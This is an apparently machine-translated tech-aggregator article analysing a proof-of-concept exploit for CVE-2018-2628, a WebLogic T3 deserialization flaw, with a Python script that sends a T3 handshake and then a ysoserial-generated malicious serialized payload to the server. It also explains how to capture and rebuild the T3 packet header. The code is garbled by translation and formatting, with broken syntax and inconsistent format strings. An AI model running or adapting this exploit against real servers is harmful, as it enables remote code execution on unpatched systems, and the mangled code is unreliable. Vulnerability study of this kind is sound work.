Shulou(Shulou.com)05/31 Report--

How to see T3 deserialization from CVE-2018-2628 POC, I believe many inexperienced people don't know what to do about it. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Handshake information between 0x00 POC and T3

First of all, post a boss's POC:

Https://blog.csdn.net/he_and/article/details/97924679

Import binasciiimport socketimport timedef T3 (): hello ='T3 12.2.1\ nAS:255\ nHL:19\ nMS:10000000\ nPU:t3://us-l-breens:7001\ n\ n' host = ('127.0.0.1, 7001) sock = socket.socket (socket.AF_INET) Socket.SOCK_STREAM) sock.settimeout (15) sock.connect (host) sock.send (hello.encode ('utf-8')) time.sleep (1) resp1 = sock.recv (1024) print (resp1) data1 =' 016501ffffffffffffffffffff00006900ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3bd11bf136d67027973720078720178720270000000000000006007070707000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 'rb') as f: a = binascii.b2a_hex (f.read ()) .decode (' utf-8') print (a) data = data1 + a data ='% s% s'% ('{: 08x} '.format (len (data) / / 2 + 4) Data) sock.send (binascii.a2b_hex (data)) time.sleep (2) sock.send (binascii.a2b_hex (data)) if _ _ name__ = "_ _ main__": T3 ()

The first step of this POC is to send a handshake message of T3 to weblogic. After receiving the message, T3 replies to the handshake message.

So try the first step:

0x01 T3 data header extraction

Look at the construction of the second step:

When I decoded the hexadecimal code in data1, I found it was garbled, and then I went to read another big shot's article:

Https://d1iv3.me/2018/06/05/CVE-2015-4852-Weblogic-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE%E5%88%86%E6%9E%90/ .

Then go to the target machine and modify / Oracle/Middleware/user_projects/domains/base_domain/bin/stopWebLogic.sh. When this script sends a stop request to another weblogic host, it will send the serialized data of T3, and then use wireshark to grab the data.

Trace the TCP flow between two IP and Hex it

Anyone familiar with the characteristics of deserialized traffic knows that each piece of serialized data begins with ac ed 00 05, so first find the location of the first segment of serialized data in the traffic.

Here is a concept of T3 data flow structure:

The above traffic is composed of many segments of anti-sequence data, which will be segmented and parsed by the weblogic backend.

So according to the instructions provided by the bosses, how to construct POC 1:

Replace any of the following serialized data at the beginning of the aced

POC Construction Mode 2

Directly concatenate the first part of the packet length with the malicious serialization data (that is, replace all the serialization data at the beginning of the aced in the regular package with one malicious serialization data)

In order to avoid trouble, use the second way directly

Here, we first intercept the non-Java serialized data in the first paragraph, and finally sort out the data like this.

0x02 T3 data structure

At this point, take a look back at the second half of the POC code:

Data1 = '016501ffffffffffffffffff0000006900ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67097372007872017872087000000a00000000000000000000000070707070000000000000000000000000000000000000000000000700006000006fe010000' with open (' poc', 'rb') as f: a = binascii.b2a_hex (f.read ()) .decode (' utf-8') print (a) data = data1 + a data ='s% s'% s'% ('{: 0x} '.format (len (data) / 2 + 4)) Data) sock.send (binascii.a2b_hex (data)) time.sleep (2) sock.send (binascii.a2b_hex (data)) if _ _ name__ = "_ _ main__": T3 ()

Here, use ysoserial.jar directly to generate the poc of a new file.

A = binascii.b2a_hex (f.read ()) .decode ('utf-8')

Convert it to a hexadecimal string representation

Data ='% s% s'% ('{: 08x} '.format (len (data) / / 2 + 4), data)

Here, the byte length of the string is evaluated, and the left complement 0 is used to calculate the length of the packet sent (8-bit hexadecimal), and use it as the beginning of the packet.

Then there are some problems with the above sorted TXT, which lies in the first four bytes, because we don't know how many bytes we have beforehand and need to recalculate them.

So the value needs to be recalculated where the arrow points.

Launch an attack on the target with the constructed POC code:

Check to see if a new file has been created:

At this point, the POC has finished the analysis.

After reading the above, have you mastered how to see T3 deserialization from CVE-2018-2628 POC? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.